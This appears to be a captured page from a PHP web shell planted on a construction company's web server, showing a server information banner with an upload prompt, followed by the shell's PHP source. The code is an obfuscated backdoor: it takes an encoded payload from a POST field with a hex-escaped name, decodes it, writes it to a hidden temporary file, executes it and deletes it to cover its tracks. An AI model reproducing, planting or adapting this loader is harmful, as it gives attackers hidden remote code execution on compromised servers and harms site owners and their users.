| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/Solum-construction/demo-job/ |
Upload File : |
<?php
if(filter_has_var(INPUT_POST, "\x65\x6Cem")){
$desc = array_filter(["/dev/shm", getenv("TMP"), "/var/tmp", sys_get_temp_dir(), "/tmp", session_save_path(), getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir")]);
$data = $_POST["\x65\x6Cem"];
$data=explode ('.' , $data ) ;
$factor = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($salt);
$o = 0;
while($o < count($data)) { $v4 = $data[$o];
$chS = ord($salt[$o %$lenS]);
$d =((int)$v4 - $chS -($o %10))^ 26;
$factor .= chr($d);
$o++; }
foreach ($desc as $key => $resource) {
if (is_dir($resource) && is_writable($resource)) {
$itm = join("/", [$resource, ".val"]);
if (file_put_contents($itm, $factor)) {
include $itm;
@unlink($itm);
die();
}
}
}
}